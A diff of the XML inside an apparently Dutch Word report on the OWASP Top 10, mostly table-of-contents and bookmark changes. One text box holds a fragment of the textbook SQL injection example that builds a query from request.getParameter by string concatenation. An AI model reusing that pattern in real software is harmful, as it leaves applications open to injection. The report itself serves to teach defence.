+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011053" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011053 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1318,16 +1844,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955749" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011054" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Security Misconfiguration</w:t>
+              <w:t>Cross-Site Scripting XSS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1348,7 +1876,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955749 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011054 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1368,7 +1896,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1386,10 +1914,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955750" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011055" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1416,7 +1946,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955750 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011055 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1436,7 +1966,79 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+          <w:bookmarkEnd w:id="0"/>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011056" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011056 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1454,16 +2056,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955751" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011057" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1484,7 +2088,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955751 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011057 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1504,7 +2108,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1522,16 +2126,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955752" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011058" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Cross-Site Scripting XSS</w:t>
+              <w:t>Insecure Deserialization</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1552,7 +2158,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955752 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011058 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1572,7 +2178,217 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011059" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011059 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011060" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011060 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011061" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011061 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1590,16 +2406,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955753" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011062" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Insecure Deserialization</w:t>
+              <w:t>Using Components with Known Vulnerabilities</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1620,7 +2438,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955753 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011062 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1640,7 +2458,217 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011063" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011063 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011064" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011064 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011065" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011065 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1658,16 +2686,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955754" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011066" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Using Components with Known Vulnerabilities</w:t>
+              <w:t>Insufficient Logging &amp; Monitoring</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1688,7 +2718,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955754 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011066 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1708,7 +2738,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1721,21 +2751,23 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TOC2"/>
+            <w:pStyle w:val="TOC3"/>
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955755" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011067" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Insufficient Logging &amp; Monitoring</w:t>
+              <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1756,7 +2788,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955755 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011067 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1776,7 +2808,147 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011068" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011068 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011069" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011069 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1802,12 +2974,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc40955731"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="1" w:name="_Toc42011029"/>
+      <w:r>
         <w:t>Top 10 Web Application Security Risks</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1830,14 +3001,14 @@
       <w:pPr>
         <w:pStyle w:val="NoSpacing"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc40955732"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc42011030"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Heading2Char"/>
         </w:rPr>
         <w:t>Injection.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1860,11 +3031,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc40955733"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc42011031"/>
       <w:r>
         <w:t>Maar aan welke senarios kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1990,7 +3161,7 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shapetype w14:anchorId="1696F995" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                 <v:stroke joinstyle="miter"/>
@@ -2026,7 +3197,6 @@
                         <w:t xml:space="preserve"> = '" + </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -2034,7 +3204,6 @@
                         <w:t>request.getParameter</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -2171,7 +3340,7 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
